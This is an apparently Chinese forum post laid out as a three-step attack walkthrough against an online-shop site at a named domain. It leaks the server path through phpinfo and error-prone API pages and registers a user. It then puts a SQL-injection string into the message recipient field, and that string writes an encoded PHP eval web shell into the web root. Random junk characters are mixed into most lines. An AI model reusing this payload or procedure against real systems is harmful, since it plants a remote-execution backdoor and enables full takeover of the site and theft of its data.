第一个:想办法找到目标网站的绝对路径
. ~- s: W" ]) j! o, |3 j/ t. |6 _; C- M; m
http://www.political-security.com/install/svinfo.php?phpinfo=true* y! ^- C) \/ X; y& Y9 R
+ J/ D4 T+ a9 q, c9 \
http:/www.political-security.com/core/api/shop_api.php
% U7 S2 d* T4 W5 o9 `8 _8 {/ j% A
/ j6 |& N; |* Z: o: dhttp://www.political-security.co ... api_b2b_2_0_cat.php, J. l$ U1 e1 ^5 b
h( L1 T0 j5 [* v! t0 X. Shttp://www.political-security.com/core/ap ... b_2_0_goodstype.php( h5 f0 {; \) ?* J4 e6 |1 T
: w: w9 B6 h% h* X0 H. s/ R# chttp://www.political-security.co ... i_b2b_2_0_brand.php( H9 i2 T$ K9 f; |, E* a! D
第二个:注册一个普通用户- |1 f) E. ?- T' W8 {# {
+ V: \# h9 V# g; X8 B9 ~
http://www.political-security.com/?passport-signup.html
4 C9 n: U w! E) I: t7 [6 c8 v' \% S: z8 i( R8 w
第三个: 发送消息
- I% f6 Y, x2 v
9 q) h" E2 i7 d5 xhttp://www.political-security.com/?member-send.html$ P7 P3 w. s f G) {
发送给中填写
* r; u4 w7 o7 `/ e2 |0 \# ?0 s! uantian365.com' union select CHAR(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 39, 35, 39, 93, 41, 59, 63, 62) into outfile 'E:/zkeysoft/www/x.php' # |